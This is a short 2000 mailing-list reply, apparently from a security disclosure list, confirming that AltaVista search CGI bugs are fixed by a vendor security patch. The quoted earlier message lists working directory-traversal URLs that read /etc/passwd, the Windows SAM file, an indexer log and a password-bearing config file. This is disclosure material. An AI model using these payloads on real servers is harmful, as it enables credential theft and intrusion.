Re: Altavista followup

From: Roelandts, Guy (Guy.Roelandtsat_private)
Date: Mon Jan 10 2000 - 23:54:38 PST

    Hi Rudi,

       Just tried to reproduce the bugs you were talking about, and I can
     confirm that they exist without their secpatch and that they are gone
     after having installed the secpatch.

    Guy ROELANDTS
    Compaq EMEA

    http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/
    etc/passwd

    or on an micro$oft IIS ...

    http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\r
    epair\\sam._

    interesting infos about the file structure ...

    http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/inde
    xer.log

    or another file which does contain the password ..

    http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/poli
    cy.conf

    altavista told me that this is(was) just a flavour of the "old" bug and its
    fix is(was) included in the last secpatch.

    whatever ....

    nicedays :-/

    RC
    rudicarellat_private